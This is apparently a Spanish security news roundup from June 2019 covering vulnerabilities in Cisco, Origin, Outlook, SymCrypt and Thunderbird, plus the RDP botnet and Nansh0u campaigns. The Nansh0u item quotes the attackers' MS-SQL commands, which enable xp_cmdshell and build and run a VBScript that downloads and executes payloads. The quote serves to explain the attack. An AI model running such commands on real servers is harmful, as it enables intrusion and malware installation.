Noticias de Seguridad Junio 2019

Bug crítico en Cisco Data Center Network Manager (DCNM)

Se han descubierto varias vulnerabilidades en la interfaz web de administración de Cisco Data Center Network Manager (DCNM) que permitirían a un atacante remoto robar la cookie de sesión activa saltándose la autenticación, subir archivos, y como consecuencia ejecutar código remoto como usuario root.

DCNM es el sistema de administración de red para todos los sistemasNX-OS que utilizan el hardware Nexus de Cisco en los centros de datos.Se encarga de solucionar problemas, detectar errores de configuración, etc. Por lo que es una parte importante para las organizaciones que utilizan Nexus switches.

La primera vulnerabilidad descubierta (CVE-2019-1619) permite a un atacante robar la cookie de sesión activa sin necesidad de conocer el usuario administrativo o contraseña. Para ello es necesario enviar una petición HTTP especialmente diseñada a un web servlet especifico que se encuentre en los dispositivos afectados.

Versiones afectadas:
– Cisco eliminó el uso del web servlet afectado en la versión 11.1, por lo que afecta a todas las versiones inferiores a 11.1

Por otro lado, la vulnerabilidad clasificada como CVE-2019-1620 se debe a una configuración incorrecta de los permisos en el software DCNM. Aprovechando este error, un atacante podría crear y escribir archivos mediante el envío de datos a un servlet web específico que se encuentra en los dispositivos afectados. De esta manera es posible incluso ejecutar código remoto con privilegio root.

Versiones afectadas:
– En las versiones inferiores a 11.1 de DCNM les afecta este fallo, pero es necesario autenticarse para aprovechar esta vulnerabilidad.
– En la versión 11.1 de DCNM no es necesario estar autenticado para acceder al servlet web afectado y explotar dicha vulnerabilidad.

En la versión 11.2 Cisco elimina la utilización del servlet web afectado delsoftware, con lo que queda parcheada dicha vulnerabilidad.

Por el momento el equipo PSIRT de Cisco no tienen conocimiento del uso malicioso de estas vulnerabilidades hasta el momento. Cisco también recomiendan actualizar a la última versión, indicando en su página web los pasos a seguir.

Más información:

Cisco Data Center Network Manager Authentication Bypass Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass

Cisco Data Center Network Manager Arbitrary File Upload and Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex

New Cisco critical bugs: 9.8/10-severity Nexus security flaws need urgent update
https://www.zdnet.com/article/new-cisco-critical-bugs-9-810-severity-nexus-security-flaws-need-urgent-update/

La policía alemana asalta la casa del desarrollador de OmniRAT

La policía alemana ha asaltado recientemente la vivienda en la que residía el desarrollador de la herramienta de administración remota para Android, MacOS, Linux y Windows «OmniRAT».

El desarrollador de la herramienta de administración remota (RAT), OmniRAT, fue sorprendido en el día de ayer en su casa por la policía de alemana. La policía asaltó su casa y precintó sus dispositivos: un portátil, un ordenador de sobremesa y algunos teléfonos móviles.

OmniRAT comenzó, en Noviembre de 2015, como un software para el control remoto de sistemas de forma legítima, pensada como una herramienta para administradores de sistemas. Se convirtió rápidamente en la herramienta más popular para administrar y monitorizar dispositivos Windows, Android, MacOS y Linux.

A principios de año, la herramienta fue utilizada por un grupo de delincuentes con fines maliciosos, instalándose a través de un exploit que aprovechaba una antigua vulnerabilidad de Microsoft Excel (CVE-2016-7262) , y al igual que otras herramientas similares, se ha acabado usando como RAT en diferentes ataques.

En uno de los ataques realizados en Enero de este año, y de acuerdo a un reporte realizado por un investigador de seguridad, los ficheros Excel utilizados para explotar la vulnerabilidad suplantaban a la empresa «Kuwait Petroleum Corporation» (KPC). De esta forma, los atacantes trataban de hacer más creíble el fichero para que las víctimas abriesen el fichero y fuesen infectados.

Aunque la compañía KPC no estuvo afectada por el ataque, si que se usó su nombre para la realización del ataque, por lo que los abogados de la compañía solicitaron al registrante del dominio de OmniRAT que proporcionasen los datos del dueño.

Aunque en su web el autor de la herramienta informa de que se trata de una herramienta legítima y que no tiene nada que ver con un troyano, parece que podría tener problemas legales debido al mal uso de la herramienta por parte de cibercriminales.

Actualmente se desconoce si la acción de la policía se produjo por la investigación realizada por KCP o si se debe a otro caso diferente que afecte al desarrollador.

Más información:

Exclusive: German Police Raid OmniRAT Developer and Seize Digital Assets
https://thehackernews.com/2019/06/police-raid-omnirat-developer.html

Descubierta vulnerabilidad de robo de cuentas en Origin

La popular plataforma de videojuegos Origin utilizada por cientos de millones de personas en todo el mundo era vulnerable a múltiples fallos de seguridad que podrían haber permitido a un usuario malintencionado tomar el control de las cuentas de otros jugadores y robar datos confidenciales.

Las vulnerabilidades descubiertas por investigadores de CheckPoint y CyberInt se pueden encadenar, de manera que, se puede secuestrar la cuenta de EA de la víctima simplemente convenciéndola de que haga click en un enlace.

Explotación de la vulnerabilidad:

Para realizar este ataque, tal y como se muestra en el siguiente vídeo, los investigadoresaprovecharon una vulnerabilidad no parcheada en el servicio en cloud Azure que les permitió tomar el control de uno de los subdominios de EA.

PoC:

El conocido fallo de Azure se puede explotar aprovechando que el CNAME del DNS de un dominio/subdominio apunte a la plataforma Azure pero este no se haya configurado/vinculado a una cuenta activa de este cloud, en este caso cualquier otro usuario de la plataforma puede secuestrarlo para estacionar ese subdominio en su propio host de Azure.

En la prueba de concepto, los investigadores secuestraron «eaplayinvite.ea.com» ypresentaron un script en él que aprovechaba las debilidades en el inicio de sesión único (SSO) de los juegos de EA y el mecanismo TRUST.

La página web finalmente permitió a los investigadores capturar tokens secretos de SSO de los jugadores con solo convencerlos de que los visitaran en el mismo navegador web en el que ya tienen una sesión activa en el sitio web de EA y tomar sus cuentas sin requerir credenciales reales.

En el peor de los casos, los investigadores de CheckPoint dijeron que un atacante podría haber explotado estas fallas para causar daños potenciales, como obtener acceso a la información de la tarjeta de crédito de los jugadores con la capacidad de comprar de manera fraudulenta la moneda del juego en nombre de los jugadores.

CyberInt y CheckPoint informaron inmediatamente de sus hallazgos a EA Games y ayudaron a la compañía a solucionar las lagunas de seguridad para proteger a sus clientes. La firma de seguridad se hizo pública hoy con sus hallazgos, casi tres meses después de que EA abordara los problemas.

Más información:

EA Origin exploit potentially exposed 300 million users to attack
https://www.itpro.co.uk/security/33916/ea-origin-exploit-potentially-exposed-300-million-users-to-attack

Resuelta vulnerabilidad de Outlook para Android que permitía la ejecución remota de código

Extraído de thehackernews.com

Seis meses después de ser identificada la vulnerabilidad CVE-2019-1105, Microsoft ha lanzado una versión actualizada de Outlook for Android, aplicación de correo electrónico usada actualmente por más de 100 millones de usuarios.

Por lo tanto, las versiones anteriores a la 3.0.88 para Android siguen manteniendo esta vulnerabilidad de cross-site scripting (XSS) anunciada en enero de 2019, que permitiría a un tercero inyectar código JavaScript o similar aprovechando la forma en que Outlook analiza los mensajes de correo electrónico entrantes. Para ello, el atacante remoto podría lograr la ejecución de código en la aplicación del dispositivo desde el lado del cliente con el envío de correos electrónicos que tuviesen un formato concreto.

«The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user.»

Según Microsoft, esta vulnerabilidad que podría ser aprovechada para realizar ataques de suplantación de identidad, fue convenientemente informada de manera responsable por múltiples investigadores de seguridad de manera independiente, incluyendo a Bryan Appleby de F5 Networks, Sander Vanrapenbusch, Tom Wyckhuys, Eliraz Duek de CyberArk y Gaurav Kumar. Además, han declarado de que no les consta ningún ataque relacionado con la CVE-2019-1105, aunque se recomienda actualizar lo antes posible la aplicación Outlook desde Google Play Store en caso de que no se haya producido aún la actualización automática.

Más información:

Bug en la librería criptográfica de Microsoft permite hacer denegación de servicio

Tavis Ormandy, investigador de seguridad de Google Project Zero, ha descubierto un bug en «SymCrypt», la librería criptográfica principal de Microsoft a partir de Windows 8.

Este bug en «SymCrypt» permite realizar una denegación de servicio en la aplicación que utilice la librería, e incluso forzando al usuario en algunos casos a reiniciar el sistema operativo.

Al tratarse de una vulnerabilidad que no permite ejecutar código malicioso, el propio investigador considera el bug como una vulnerabilidad de baja severidad. Aunque en ciertos casos, como es el caso de software para servidores como «Internet Information Services», una vulnerabilidad de denegación de servicio puede ser un problema importante.

El error se encuentra en la función «SymCryptFdefModInvGeneric», encargada de hacer el calculo del inverso modular. Durante el calculo del inverso modular, se produce un bucle infinito al realizar los cálculos en ciertos patrones de bits.

Tavis Ormandy ha realizado pruebas generando un certificado X.509 que explota la vulnerabilidad, y que al incluirlo en, por ejemplo, un mensaje S/MIME permite realizar una denegación de servicio a un servicio de Windows.

Según el investigador de Google, el fallo se reportó a Microsoft hace 91 días, tras los cuales, Microsoft no ha liberado ningún parche que resuelva el problema. Por ello, después de estos 91 días, se ha liberado la información acerca de la vulnerabilidad. Según Microsoft, el parche que resuelve este error se publicará junto al resto de parches de seguridad el 9 de julio.

Más información:

Issue 1804: cryptoapi: SymCrypt modular inverse algorithm
https://bugs.chromium.org/p/project-zero/issues/detail?id=1804

Vulnerabilidades en Thunderbird

Mozilla Foundation ha publicado el boletín de seguridad MFSA2019-17 que solventa 4 fallos en su popular cliente de correo, Thunderbird. Tres de estas vulnerabilidades han sido clasificadas de gravedad alta.

Mozilla Thunderbird es un cliente de correo electrónico multiplataforma de código abierto y libre, cliente de noticias, cliente de RSS y de chat desarrollado por la Fundación Mozilla.

Las vulnerabilidades, presentes en la implementación de iCal, son las siguientes:

* CVE-2019-11703: un desbordamiento de memoria en la función ‘parser_get_next_char’ localizada en el fichero ‘icalparser.c’ al procesar un calendario adjunto podría permitir la ejecución de código remoto.

* CVE-2019-11704: una falta de comprobación de límites en la función‘icalmemory_strdup_and_dequote’ en ‘icalvalue.c’ cuando la cadena de entrada finaliza con el carácter ‘\’ podría provocar la lectura y escritura fuera de límites de la memoria, de referencia a puntero nulo, y corrupción de la memoria. La explotación exitosa de este fallo de seguridad podría permitir la ejecución de código remoto.

* CVE-2019-11705: una validación incorrecta en la función ‘icalrecuradd_bydayrules’ localizada en ‘icalrecur.c’ podría permitir la ejecución de código remoto.

* CVE-2019-11706: una confusión de tipos en la función ‘icaltimezone_get_vtimezone_properties’ en ‘icalproperty.c’ al analizar un archivo adjunto de calendario con formato incorrecto podría ser aprovechada para revelar información sensible.

Estos fallos de seguridad han sido reportados por Luis Merino de X41 D-SEC, quien además ha proporcionado pruebas de concepto para cada uno de ellos en GitHub.

Thunderbird 60.7.1, que corrige todas las vulnerabilidades expuestas, está disponible para su descarga desde la página oficial.

Nueva Botnet ataca mediante fuerza bruta servidores RDP

Investigadores de seguridad han descubierto una botnet que está llevando a cabo una campaña de fuerza bruta contra mas de un millón y medio de servidores RDP públicamente accesibles desde Internet.

Bautizada como GoldBrute, se ha diseñado de forma que escala gradualmente añadiendo cada máquina comprometida a la botnet y forzándolas a encontrar nuevos servidores RDP e intentar atacarlos por fuerza bruta.

Para pasar desapercibida, los atacantes detrás de esta campaña ordenaban a cada máquina infectada a hacer fuerza bruta a millones de servidores RDP con un conjunto único de pares de usuario y contraseña de modo que el servidor atacado recibe intentos de conexión desde direcciones IP diferentes cada vez.

La campaña, descubierta por Renato Marinho, de Morphus Labs, funciona de la siguiente forma:

Paso 1 – Después de acceder a un servidor RDP usando fuerza bruta, el atacante instala una botnet basada en Java en la máquina.

Paso 2 – Para controlar las máquinas infectadas, los atacantes utilizan un servidor C2 (command and control) con el que intercambiar ordenes e información sobre un WebSocket con cifrado AES.

Paso 3 y 4 – Cada máquina infectada recibe como primera tarea escanear y reportar al servidor C2 una lista de al menos 80 servidores RDP públicamente accesibles que pueden ser atacados por fuerza bruta.

Paso 5 y 6 – Los atacantes asignan a cada máquina infectada con un par único de usuario/contraseña como segunda tarea, para intentar hacer fuerza bruta contra la lista de servidores RDP que la máquina infectada recibe del servidor C2.

Paso 7 – En los casos en los que la credencial haya funcionado, se reporta la información de vuelta al servidor C2.

En este momento, una búsqueda rápida en Shodan arroja 2.4 millones de servidores RDP que pueden ser accedidos públicamente y probablemente más de la mitad de ellos estén siendo atacados por fuerza bruta.

Más Información:

https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d

https://thehackernews.com/2019/06/windows-rdp-brute-force.html

Finaliza UAD360, el primer congreso de seguridad informática de la provincia de Málaga.

El evento acogió el pasado fin de semana a cerca de 300 personas que se desplazaron desde muchos puntos de España para acudir al primer congreso de estas características en la provincia de Málaga.

Soledad Antelada, de Berkeley Lab, durante su ponencia en UAD360

Durante los días 7 y 8 de Junio ha tenido lugar en Málaga el congreso UAD360, el primer congreso de la provincia de Málaga netamente orientado a la seguridad informática, organizado por Hispasec y la Universidad de Málaga, y que contó con el patrocinio deBuguroo apoyo de Extenda y el Instituto Nacional de Ciberseguridad (INCIBE). El evento contó con la acogida de cerca de 300 personas venidas de distintos puntos de España, que acudieron puntuales a la cita.

UAD360 tuvo la suerte de contar para su primera edición con algunos de los profesionales más reputados del sector, que pusieron al alcance de los asistentes contenidos inéditos con un alto grado de especialización, innovación y calidad técnica.

Así, durante toda la jornada del sábado, el aula magna de la Facultad de Derecho se llenó para escuchar a Soledad Antelada, ingeniera en ciberseguridad del Berkeley National Lab, Bernardo Quintero, fundador de Virus Total, Sergio de los Santos, director de Innovación y Ciberseguridad en ElevenPaths (Telefónica Digital), David Santos, experto en seguridad informática implicado en el área de ciberseguridad de la Guardia Civil y Fernando Díaz, ingeniero de software en Virus Total.

Algunos de los temas tratados en las ponencias fueron la securización de la infraestructura de la red más rápida del mundo, las posibilidades – y brechas – en la anonimización permitida por la red TOR, el análisis del caso Wannacry, el estudio de código aplicado al hacking en videojuegos o la relevancia de vectores de ataque como la ingeniería social en los escenarios actuales de ciberdefensa, entre otros muchos que fueron sacados a la luz por el público asistente, durante la posterior mesa redonda con los ponentes y autoridades en la materia.

Si durante el sábado, la atención del congreso estuvo dirigida a estas ponencias, el viernes pudo disfrutarse de talleres prácticos repartidos en distintas aulas de la facultad. En este sentido, el público pudo comprobar en directo cómo se realiza una intrusión completa en una variedad de sistemas Windows, entender en profundidad cómo explotar vulnerabilidades en software para GNU/Linux mediante reversing y exploiting y la influencia y posibilidades de la Inteligencia Artificial en el campo de la seguridad informática.

De forma paralela, tuvo lugar un CTF, una competición por equipos donde los participantes hicieron gala de sus habilidades para resolver un total de 25 retos de temática variada (criptografía, análisis forense o exploiting, entre otras). Se entregaron, además, premios a los tres equipos que tuvieran la puntuación más alta, por valor de más de 4000€ entre suscripciones al servicio Koodous, periféricos tecnológicos y merchandising.

El evento terminó con una fiesta a la que estaban invitados todos los asistentes, que supuso una ocasión perfecta para acercarse de un modo menos académico y más distendido a la seguridad informática, a los especialistas que allí se dieron cita y de contactar con multitud de equipos de hacking que acudieron al evento desde distintos puntos de España.

Filtrado otro zero-day de Windows para CVE-2019-0841

La investigadora en seguridad informática que opera bajo el pseudónimo de SandboxEscaper, publica una nueva vulnerabilidad para realizar un bypass contra algunas medidas de seguridad de sistemas operativos Windows.

Se trata de una vulnerabilidad que permite la elevación de privilegios en sistemas Windows a través del abuso del navegador nativo Microsoft Edge. Si en otras ocasiones, la investigadora avisó previamente a Microsoft de los fallos encontrados, en esta ocasión decidió filtrar las vulnerabilidades sin previo aviso.

Conviene recordar que la investigadora ha estado filtrando exploits y pruebas de concepto para estas vulnerabilidades durante las dos últimas semanas. Esta última permitiría, a través de una aplicación especialmente diseñada para ello, la elevación de privilegios y la toma de control completa sobre el sistema mediante la inyección de una DLL maliciosa.

Si bien es cierto que los vídeos que actúan como prueba de concepto abusan de Microsoft Edge, la investigadora indica que se trata de una vulnerabilidad que implica unarace condition replicable en muchos otros paquetes.

El próximo día 11 de Junio, podrá comprobarse si Microsoft está al tanto de las vulnerabilidades y si incluye soluciones para las vulnerabilidades detectadas porSandboxEscaper.

El navegador web Firefox ahora bloquea las cookies de seguimiento de terceros de forma predeterminada

Como se prometió, Mozilla finalmente ha habilitado la función de «Protección de seguimiento mejorada» en su navegador Firefox de forma predeterminada, que a partir de ahora bloqueará automáticamente todas las cookies de seguimiento de terceros que permiten a los anunciantes y sitios web rastrear a los usuarios que navegan por las web.

Las cookies de seguimiento, también conocidas como cookies de terceros, permiten a los anunciantes controlar su comportamiento e intereses en línea, mediante los cuales muestran anuncios, contenido y promociones relevantes en los sitios web que visita.

Sin embargo, dado que las cookies de rastreo recopilan mucha más información sin requerir permisos explícitos de los usuarios y no hay control sobre cómo las usarían las compañías, la técnica también representa una amenaza masiva para la privacidad en línea de los usuarios. Para limitar este seguimiento extenso, Mozilla incluyó la opción «Protección de rastreo mejorada» como una función experimental en octubre del año pasado con el lanzamiento de Firefox 63 para bloquear «cookies de rastreo de terceros» conocidas compiladas por una herramienta de código abierto de anti-rastreo llamada Desconectar.

A partir de ahora, la configuración de «Protección de seguimiento mejorada» se habilitará de forma predeterminada para los nuevos usuarios que descarguen e instalen una copia nueva de Firefox, mientras que los usuarios existentes pueden habilitar la función manualmente o esperar a que Mozilla active la función para todos los usuarios en los próximos meses

Como activar la función de Protección de seguimiento

Para activar la función de Protección de seguimiento mejorada, simplemente siga los pasos a continuación:

  • Haga clic en el icono del menú de su navegador web Firefox.
  • Seleccione «Bloqueo de contenido».
  • Ve a tu configuración de «Privacidad y Seguridad».
  • Seleccione el engranaje «Custom».
  • Ahora seleccione «rastreadores de terceros» en «Cookies».

Más información:

Enable and disable cookies that websites use to track your preferences
https://support.mozilla.org/en-US/kb/enable-and-disable-cookies-website-preferences

Criminales roban datos de tarjetas de crédito de clientes de «Checkers» y «Rally’s»

Criminales roban datos de tarjetas de crédito de 103 restaurantes «Checkers» y «Rally’s»

La cadena de restaurantes «Checkers» y «Rally’s» ha descubierto en los últimos días que unos criminales han accedido a los datos de tarjetas de crédito de sus clientes que almacenaban en sus puntos de venta.

Según la famosa cadena de restaurantes, han descubierto un malware especialmente diseñado para robar datos de tarjetas de crédito en 103 de sus restaurantes. Según la investigación, los criminales no han obtenido otros datos de sus clientes más allá de los datos de sus tarjetas de crédito. Además, no todos los clientes de estos 103 restaurantes han sido afectados, los atacantes han obtenido los datos de una parte de los clientes.

Por el momento no se conoce la forma en la que los atacantes consiguieron instalar el software malicioso en los puntos de venta de los restaurantes. Uno de estos puntos de venta ha estado infectado por el malware desde diciembre de 2015, y ha estado capturando datos de tarjetas de crédito hasta marzo de 2018.

La compañía afirma que ha estado colaborando con las autoridades y con las compañías de tarjetas de crédito para detectar posibles usos fraudulentos de las tarjetas y detectar infecciones de malware en otros puntos de venta.

Por parte de la compañía, se recomienda a los clientes que revisen sus cuentas y los movimientos realizados con las tarjetas de crédito.

Más información:

Hackers Stole Customers’ Credit Cards from 103 Checkers and Rally’s Restaurants
https://thehackernews.com/2019/05/credit-card-checkers-restaurants.html

Infectados más de 50.000 servidores MS-SQL y PHPMyAdmin con un rootkit

Investigadores del Guardicore Labs publicaron el pasado 29 de mayo un amplio informe detallando una campaña de cryptojacking que atacaba a servidores MS-SQL (Windows) y PHPMyAdmin. Esta campaña fue seguida por Guardicore Labs en los meses de abril y mayo.

Esta campaña maliciosa ha sido bautizada como Nansh0u, una campaña realizada por cibercriminales chinos que consiguieron infectar cerca de 50.000 servidores. Una vez que los servidores eran comprometidos, se infectaron con payloads maliciosos y éstos a su vez, utilizaron un crypto-miner e instalaron un sofisticado rootkit de modo kernel para evitar de esta manera que el malware finalice y asegurando una persistencia en el equipo infectado.

Esta campaña no es un típico crypto-miner. Nansh0u lo que utiliza son técnicas que se ven a menudo en APTs, como certificados falsos y explotaciones de escalada de privilegios. El problema reside que para ataques de este tipo, existe un gran arsenal de herramientas que pueden caer en malas manos y provocar daños mayores.

A principios de abril, Guardicore detectó y se centró en tres ataques de los que encontró que tenían una IP ubicada en Sudáfrica . Una vez visto esto, siguieron buscando y encontraron nuevas campañas datadas en febrero, elevando el número de payloads maliciosos detectados a 20. Este es el timeline de la campaña.

Este timeline, combinado con un conjunto de 5 ataques y 6 conexiones inversas a los distintos servidores ya mencionados, sugieren que este proceso ha sido establecido por un proceso de desarrollo continuo el cual fue debidamente pensado por los cibercriminales.

Gracias a esta investigación, Guardicore demuestra el crecimiento exponencial del número de infecciones, llegando al doble de infecciones en tan sólo un mes.

Cada ataque realizado comenzó con una serie de intentos de autenticación con ataques de fuerza bruta a servidores MS-SQL, llegando a obtener acceso a cuentas con privilegios de administrador. Esto es ocasionado por una mala política de contraseña. permitiendo contraseñas por defecto o débiles.

Tras obtener acceso, se ejecutaron una serie de comandos MS-SQL que permitían, entre otras cosas, configurar los ajustes de los servidores, crear un script Visual-Basic en c:\ProgramData\1.vbs, ejecutar este script y descargar dos archivos via HTTP y finalmente correr ambos archivos.

"
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',
1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed
Queries',1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation
Procedures
',1;RECONFIGURE


exec xp_cmdshell 'echo on error resume next >c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo with wscript:if .arguments.count^<2 then .quit:end if >>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp")
>>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit
>>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile
.arguments(1),2:end with >>c:\ProgramData\2.vbs'


exec xp_cmdshell 'cscript c:\ProgramData\2.vbs / c:\ProgramData\'
exec xp_cmdshell 'cscript c:\ProgramData\2.vbs / c:\ProgramData\'


exec xp_cmdshell 'c:\ProgramData\ c:\ProgramData\'
"

Los investigadores también elaboraron una lista completa de IoCs que publicaron en su Github y un script en Powershell que también hicieron público.

Como toda esta campaña comienza con una serie de intentos de accesos combinando usuarios y contraseñas por defecto o débiles para posteriormente proceder-como se ha comentado- a la infección de los distintos servidores; desde Hispasec recomendamos utilizar contraseñas robustas, que se cambien periódicamente y con 2FA para minimizar los daños de este y otros ataques.

Más información

Guardicore – The Nansh0u Campaign – Hackers Arsenal Grows Stronger
https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/